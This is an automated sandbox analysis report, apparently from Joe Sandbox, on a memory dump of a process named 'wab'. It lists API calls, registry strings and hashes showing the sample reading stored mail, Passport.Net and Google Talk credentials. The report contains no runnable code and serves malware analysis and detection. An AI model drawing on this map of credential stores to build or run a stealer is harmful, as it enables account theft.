                      • API ID: CloseOpen$memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
                      • String ID: Dynamic Salt$Software\Microsoft\IdentityCRL$Value$XnE
                      • API String ID: 2768085393-2409096184
                      • Opcode ID: 450d76980a5b045f2fe885eff3fb720ced70e3f8b230ed55941267a192e7c898
                      • Instruction ID: dc42a4d3869b5799c80e2b369f36587618a74ee4c7744a3ab9dbe2425e101413
                      • Opcode Fuzzy Hash: 450d76980a5b045f2fe885eff3fb720ced70e3f8b230ed55941267a192e7c898
                      • Instruction Fuzzy Hash: BA316F72508348AFE750DF51DC81E5BBBECFB88358F04093EBA94E2151D735D9188B6A

                      Control-flow Graph

                      APIs
                      • memset.MSVCRT ref: 0044430B
                        • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075A0
                        • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075AB
                        • Part of subcall function 0040759E: _mbscat.MSVCRT ref: 004075C2
                        • Part of subcall function 00410DBB: memset.MSVCRT ref: 00410E10
                        • Part of subcall function 00410DBB: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                        • Part of subcall function 00410DBB: _mbscpy.MSVCRT ref: 00410E87
                      • memset.MSVCRT ref: 00444379
                      • memset.MSVCRT ref: 00444394
                        • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                      • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004443CD
                      • strlen.MSVCRT ref: 004443DB
                      • _strcmpi.MSVCRT ref: 00444401
                      Strings
                      • Store Root, xrefs: 004443A5
                      • Software\Microsoft\Windows Live Mail, xrefs: 004443AA
                      • \Microsoft\Windows Live Mail, xrefs: 00444350
                      • \Microsoft\Windows Mail, xrefs: 00444329
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: memset$strlen$Close$EnvironmentExpandStrings_mbscat_mbscpy_strcmpi
                      • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                      • API String ID: 832325562-2578778931
                      • Opcode ID: 88eecb5596c8840dacdab9e6d9cddf85e53b3344e0b54babe6c18053d28390f2
                      • Instruction ID: c969096c6c8075cae9da81fbffcb27ba025b1fc1210c9b39c3855a2ab2b3ab2e
                      • Opcode Fuzzy Hash: 88eecb5596c8840dacdab9e6d9cddf85e53b3344e0b54babe6c18053d28390f2
                      • Instruction Fuzzy Hash: A73197725083446BE320EA99DC47FCBB7DC9B85315F14441FF64897182D678E548877A

                      Control-flow Graph
                      • Graph 308 (legend and node/edge list omitted): entry block 0040F460-0040F5BD calls memset ×2 and RegOpenKeyExA; later blocks call RegQueryValueExA ×2, memcpy, LocalFree and RegCloseKey.
                      APIs
                      • memset.MSVCRT ref: 0040F567
                      • memset.MSVCRT ref: 0040F57F
                        • Part of subcall function 004078BA: _mbsnbcat.MSVCRT ref: 004078DA
                      • RegOpenKeyExA.KERNELBASE(80000001,00000082,00000000,00020019,?,?,?,?,?,00000000), ref: 0040F5B5
                      • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040F5E2
                      • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F6B7
                        • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                        • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                        • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                      • memcpy.MSVCRT ref: 0040F652
                      • LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040F664
                      • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000), ref: 0040F6D3
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: QueryValuememset$AddressCloseFreeLibraryLoadLocalOpenProc_mbscpy_mbsnbcatmemcpy
                      • String ID:
                      • API String ID: 2012582556-3916222277
                      • Opcode ID: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
                      • Instruction ID: 8a535e2a1d92942c08e22e27bc62a3a9d9c5418ddd7b2e408e782496f1cf9495
                      • Opcode Fuzzy Hash: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
                      • Instruction Fuzzy Hash: 9E81FC218047CEDEDB31DBBC8C485DDBF745B17224F0843A9E5B47A2E2D3245646C7AA

                      Control-flow Graph
                      • Graph 338 (legend and node/edge list omitted): entry block 004037CA-0040381C calls memset ×2; later blocks call strchr, _mbscpy, strlen, sprintf and _mbscpy.
                      APIs
                      • memset.MSVCRT ref: 004037EB
                      • memset.MSVCRT ref: 004037FF
                        • Part of subcall function 00444551: memset.MSVCRT ref: 00444573
                        • Part of subcall function 00444551: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                        • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                        • Part of subcall function 00406F06: memcpy.MSVCRT ref: 00406F20
                      • strchr.MSVCRT ref: 0040386E
                      • _mbscpy.MSVCRT ref: 0040388B
                      • strlen.MSVCRT ref: 00403897
                      • sprintf.MSVCRT ref: 004038B7
                      • _mbscpy.MSVCRT ref: 004038CD
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: memset$_mbscpystrlen$Closememcpysprintfstrchr
                      • String ID: %s@yahoo.com
                      • API String ID: 317221925-3288273942
                      • Opcode ID: 94ee0ce22b792c256a50841e845a97cde8158fcf202da7b3a2aba60cc9f07639
                      • Instruction ID: 76d3f49adc6711096ede71316d8c54080aa8a6e72e6628a7d10ff16d2d587f45
                      • Opcode Fuzzy Hash: 94ee0ce22b792c256a50841e845a97cde8158fcf202da7b3a2aba60cc9f07639
                      • Instruction Fuzzy Hash: 4B2154B3D001285EEB11EA54DD42FDA77ACDF85308F0404EBB649F7041E678AF888A59

                      Control-flow Graph
                      • Graph 354 (legend and node/edge list omitted): entry block 00404A99-00404AC2 calls LoadLibraryA; later blocks call GetProcAddress, FreeLibrary and MessageBoxA.
                      APIs
                      • LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                      • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                      • FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                      • MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: Library$AddressFreeLoadMessageProc
                      • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                      • API String ID: 2780580303-317687271
                      • Opcode ID: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
                      • Instruction ID: 488ab604db7d7bb3946a6a0ddadc23e58717ff74c8dc9d9f2a6c2f93e1cc5ebb
                      • Opcode Fuzzy Hash: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
                      • Instruction Fuzzy Hash: F401D679B512106BE7115BE59C89F6BBAACDB86759B040135BA02F1180DAB899018A5C

                      Control-flow Graph
                      • Graph 365 (legend and node/edge list omitted): entry block 004034E4-00403544 calls memset ×2; block 00403546-0040357F calls _mbscpy and _mbscat.
                      APIs
                      • memset.MSVCRT ref: 00403504
                      • memset.MSVCRT ref: 0040351A
                        • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                      • _mbscpy.MSVCRT ref: 00403555
                        • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                        • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                      • _mbscat.MSVCRT ref: 0040356D
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: _mbscatmemset$Close_mbscpystrlen
                      • String ID: InstallPath$Software\Group Mail$fb.dat
                      • API String ID: 3071782539-966475738
                      • Opcode ID: ba1e5b879fdebbe75c382cc963f8f285cb869b8741e9311d789e5899e64a9370
                      • Instruction ID: a2fd564f6d67a76fe1541fb13c78ccc0c8ee6374decffd3371ae058987aad369
                      • Opcode Fuzzy Hash: ba1e5b879fdebbe75c382cc963f8f285cb869b8741e9311d789e5899e64a9370
                      • Instruction Fuzzy Hash: C201FC7694416875E750F6659C47FCAB66CCB64705F0400A7BA48F30C2DAF8BBC486A9

                      Control-flow Graph
                      • Graph 374 (legend and node/edge list omitted): entry block 0040F6E2-0040F70A makes no direct API calls; later blocks call CredReadA, WideCharToMultiByte, strlen, _mbscpy and LocalFree.
                      APIs
                        • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                        • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                        • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                        • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                      • CredReadA.ADVAPI32(Passport.Net\*,00000004,00000000,?,?,00000000), ref: 0040F729
                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000100,000000FF,00000000,00000000,?,?,?,?,00000000), ref: 0040F7AE
                      • strlen.MSVCRT ref: 0040F7BE
                      • _mbscpy.MSVCRT ref: 0040F7CF
                      • LocalFree.KERNEL32(00000000,?,00000000), ref: 0040F7DC
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: AddressProc$LibraryLoad_mbscpy$ByteCharCredFreeLocalMultiReadWidestrlen
                      • String ID: Passport.Net\*
                      • API String ID: 4000595657-3671122194
                      • Opcode ID: 0af64cc57546a9fbf77b674907fee208d195fdaa1b5113e78288b1972eb9facf
                      • Instruction ID: cbd5109d0b46f6ae46d16b49076c688dceaf9cc559dd015bf255ce3d8649dee3
                      • Opcode Fuzzy Hash: 0af64cc57546a9fbf77b674907fee208d195fdaa1b5113e78288b1972eb9facf
                      • Instruction Fuzzy Hash: 98316F76900109ABDB10EFA6DD45DAEB7B9EF89300F10007BE605F7291DB389A04CB59

                      Control-flow Graph
                      • Graph 401 (legend and node/edge list omitted): entry block 0040CCD7-0040CD06 calls ??2@YAPAXI@Z (operator new); later blocks call ??2@YAPAXI@Z, DeleteObject, memset, LoadIconA and _mbscpy.
                      APIs
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: ??2@$DeleteIconLoadObject_mbscpymemset
                      • String ID:
                      • API String ID: 2054149589-0
                      • Opcode ID: ac2346bdc6bf8c69db932d73876581c2cd712649df4ebdee0f030b2719307f74
                      • Instruction ID: e49e2262ea613e2b532621416bf92f05b9d60d1a181aada648b692035ce2a44d
                      • Opcode Fuzzy Hash: ac2346bdc6bf8c69db932d73876581c2cd712649df4ebdee0f030b2719307f74
                      • Instruction Fuzzy Hash: C921A1B0900360DBDB10DF749DC97897BA8EB40B04F1405BBED08FF286D7B895408BA8

                      Control-flow Graph

                      APIs
                        • Part of subcall function 004082CD: memset.MSVCRT ref: 0040832F
                        • Part of subcall function 004082CD: memset.MSVCRT ref: 00408343
                        • Part of subcall function 004082CD: memset.MSVCRT ref: 0040835F
                        • Part of subcall function 004082CD: memset.MSVCRT ref: 00408376
                        • Part of subcall function 004082CD: GetComputerNameA.KERNEL32(?,?), ref: 00408398
                        • Part of subcall function 004082CD: GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                        • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                        • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                        • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083E9
                        • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083F8
                        • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                      • memset.MSVCRT ref: 00408620
                        • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                      • memset.MSVCRT ref: 00408671
                      • RegCloseKey.ADVAPI32(?,?,?), ref: 004086AF
                      • RegCloseKey.ADVAPI32(?), ref: 004086D6
                      Strings
                      • Software\Google\Google Talk\Accounts, xrefs: 004085F1
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUser
                      • String ID: Software\Google\Google Talk\Accounts
                      • API String ID: 1366857005-1079885057
                      • Opcode ID: b24b9a54dcd0214932f6ac2563ed0d1b1cb372bdd45dc4bf833f1fe5ea734f55
                      • Instruction ID: c9a55fd20ea1a9e1148d2ba128c2c272dfe10edd9ec9a97c612e1cc238572be2
                      • Opcode Fuzzy Hash: b24b9a54dcd0214932f6ac2563ed0d1b1cb372bdd45dc4bf833f1fe5ea734f55
                      • Instruction Fuzzy Hash: 6E2181B140830AAEE610EF51DD42EAFB7DCEF94344F00083EB984D1192E675D95D9BAB

                      Control-flow Graph

                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: Cursor_mbsicmpqsort
                      • String ID: /nosort$/sort
                      • API String ID: 882979914-1578091866
                      • Opcode ID: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                      • Instruction ID: 8a1fc52e493d51bfa0df36ad286e8752cb28bf69c391dd95ac0f49afa8242728
                      • Opcode Fuzzy Hash: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                      • Instruction Fuzzy Hash: 2D2192B1704601EFD719AF75C880A69B7A9FF48318B10027EF419A7291CB39BC12CBD9
                      APIs
                        • Part of subcall function 00410D0E: LoadLibraryA.KERNEL32(shell32.dll,00410DCA,00000104), ref: 00410D1C
                        • Part of subcall function 00410D0E: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
                      • memset.MSVCRT ref: 00410E10
                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                      • _mbscpy.MSVCRT ref: 00410E87
                        • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                      Strings
                      • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00410E2B, 00410E3B
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: AddressCloseLibraryLoadProcVersion_mbscpymemset
                      • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                      • API String ID: 889583718-2036018995
                      • Opcode ID: ed5743d336984a8c18282994424b44d0bcfcd120d49097e0ee850cbc5c972bb8
                      • Instruction ID: 345612a4203e2947e26158410096d7c3d27216bde768142914c78e2e12d87323
                      • Opcode Fuzzy Hash: ed5743d336984a8c18282994424b44d0bcfcd120d49097e0ee850cbc5c972bb8
                      • Instruction Fuzzy Hash: 89110D71C40318EBEB20B6D59C86EEF77ACDB14304F1404A7F555A2112E7BC9ED8C69A
                      APIs
                      • FindResourceA.KERNEL32(?,?,?), ref: 00410C75
                      • SizeofResource.KERNEL32(?,00000000), ref: 00410C86
                      • LoadResource.KERNEL32(?,00000000), ref: 00410C96
                      • LockResource.KERNEL32(00000000), ref: 00410CA1
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: Resource$FindLoadLockSizeof
                      • String ID:
                      • API String ID: 3473537107-0
                      • Opcode ID: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                      • Instruction ID: 06b8370cebe37c7de172ca18b7cbf64f7437cd91f528590ddf6fb1777473d23a
                      • Opcode Fuzzy Hash: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                      • Instruction Fuzzy Hash: 090196367012166F8B185F69DD9489F7EAEFB853913084136FC05C6361EB71C9818ED8
                      APIs
                      • memset.MSVCRT ref: 004109F7
                        • Part of subcall function 004075CD: sprintf.MSVCRT ref: 00407605
                        • Part of subcall function 004075CD: memcpy.MSVCRT ref: 00407618
                      • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410A1B
                      • memset.MSVCRT ref: 00410A32
                      • GetPrivateProfileStringA.KERNEL32(?,?,0044C52F,?,00002000,?), ref: 00410A50
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: PrivateProfileStringmemset$Writememcpysprintf
                      • String ID:
                      • API String ID: 3143880245-0
                      • Opcode ID: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                      • Instruction ID: 950c872411b2f2d44c5e3370b52dcf3132a88c3cdc41bb294f16927293e6b240
                      • Opcode Fuzzy Hash: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                      • Instruction Fuzzy Hash: A401A172804319BBEF119F50DC86EDB7B7CEF05344F0000A6F604A2052E635AA64CBA9
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: ??2@
                      • String ID:
                      • API String ID: 1033339047-0
                      • Opcode ID: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                      • Instruction ID: b7305a6f8e60e4354fc193aeb8e5872e67636dbc7b7f4d43fc505f02bd19535d
                      • Opcode Fuzzy Hash: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                      • Instruction Fuzzy Hash: EEF031F05433615EEB559F34ED0672536A4E784302F024B3EE2059A2E6EB78D4908B09
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: ??3@mallocmemcpy
                      • String ID:
                      • API String ID: 3831604043-0
                      • Opcode ID: a96fb65c017a86587ba071467795d458f8ca9669e817bb347d51b960c43a4168
                      • Instruction ID: 20c18abb4fba39fec419649699297209b7413d51c31022bf8d4f5bc21a778af6
                      • Opcode Fuzzy Hash: a96fb65c017a86587ba071467795d458f8ca9669e817bb347d51b960c43a4168
                      • Instruction Fuzzy Hash: 39F0E9726092235FD7089E7AB881D0BB3ADEF94324711482FF445E7281D738EC60C6A8
                      APIs
                        • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                        • Part of subcall function 00406FC7: _mbscpy.MSVCRT ref: 00407011
                      • CreateFontIndirectA.GDI32(?), ref: 004070A6
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: CreateFontIndirect_mbscpymemset
                      • String ID: Arial
                      • API String ID: 3853255127-493054409
                      • Opcode ID: a9edf0add2530cae1e73dc887b0500a6e6731c557fb9a9d8b72d1c15ab1f178d
                      • Instruction ID: 3e85f73e1de40fb669f60d67ce34a2ecc2b5129f84855d11383e820b071861b9
                      • Opcode Fuzzy Hash: a9edf0add2530cae1e73dc887b0500a6e6731c557fb9a9d8b72d1c15ab1f178d
                      • Instruction Fuzzy Hash: FDD0C9A0E4020D67D710F7A0FD47F49776C5B00604F510831B905F10E1EAA4A1184A99
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: ProtectVirtual
                      • String ID:
                      • API String ID: 544645111-0
                      • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                      • Instruction ID: 9d5022db8ba3b04779ac2e9664088e7462d9cf1087a2f4409b49694314ac1291
                      • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                      • Instruction Fuzzy Hash: FB21F7114496816FFB218BB84C017B67BD8DB13364F19469BE184CB243D76CD85693FA
                      APIs
                        • Part of subcall function 00401E69: memset.MSVCRT ref: 00401E8B
                        • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EA4
                        • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EB2
                        • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EF8
                        • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401F06
                      • _strcmpi.MSVCRT ref: 0040CEC3
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: strlen$_strcmpimemset
                      • String ID: /stext
                      • API String ID: 520177685-3817206916
                      • Opcode ID: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                      • Instruction ID: 693fdb5656bfadad22d3d4febeb48e05c11e25f360cf1d4a61822c7fe8fbaaaa
                      • Opcode Fuzzy Hash: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                      • Instruction Fuzzy Hash: 5B210C71614112DFC3589B39C8C1966B3A9BF45314B15427FA91AAB392C738EC119BC9
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: ProtectVirtual
                      • String ID:
                      • API String ID: 544645111-0
                      • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                      • Instruction ID: 5df47aada64e755ddaac71019e2cddcac14d14db73bdb0f929895f2225ac57a9
                      • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                      • Instruction Fuzzy Hash: DB012D01545A4179FF21AAB50C02ABB5F8CDA23364B145B4BF750CB293DB5CC90693FE
                      APIs
                      • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                      • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: ProtectVirtual
                      • String ID:
                      • API String ID: 544645111-0
                      • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                      • Instruction ID: 565c9894d902a96607ae12053a83652f4dbbb150929c791eaa1536a67b179355
                      • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                      • Instruction Fuzzy Hash: 83F0C201589A407DFE2155B50C42ABB5B8CCA27320B244B07F654CB383D79DC91A93FA
                      APIs
                        • Part of subcall function 00404785: FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                      • LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                      • GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: Library$AddressFreeLoadProc
                      • String ID:
                      • API String ID: 145871493-0
                      • Opcode ID: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                      • Instruction ID: d196b3276b1a656cda378f5c53e28a4a33de773bbf59b12af1a3f4d2ec041ade
                      • Opcode Fuzzy Hash: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                      • Instruction Fuzzy Hash: 35F065F8500B039BD7606F34D84879BB3E9AF86310F00453EF961A3281EB38E541CB58
                      APIs
                      • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410A92
                        • Part of subcall function 00410983: memset.MSVCRT ref: 004109A1
                        • Part of subcall function 00410983: _itoa.MSVCRT ref: 004109B8
                        • Part of subcall function 00410983: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 004109C7
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: PrivateProfile$StringWrite_itoamemset
                      • String ID:
                      • API String ID: 4165544737-0
                      • Opcode ID: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                      • Instruction ID: e4187046b5889157fb54d5f6e3f9ccfafaefd38d22cef98a7399574687248963
                      • Opcode Fuzzy Hash: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                      • Instruction Fuzzy Hash: 3DE0B63204020DBFDF125F90EC01AA97B66FF14355F14845AF95804131D37295B0AF94
                      APIs
                      • FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: FreeLibrary
                      • String ID:
                      • API String ID: 3664257935-0
                      • Opcode ID: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                      • Instruction ID: 8a1fb59f4aee03ee333bbcbb21747f572c22b5e480e1b07aa067c0b07a2bbf9c
                      • Opcode Fuzzy Hash: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
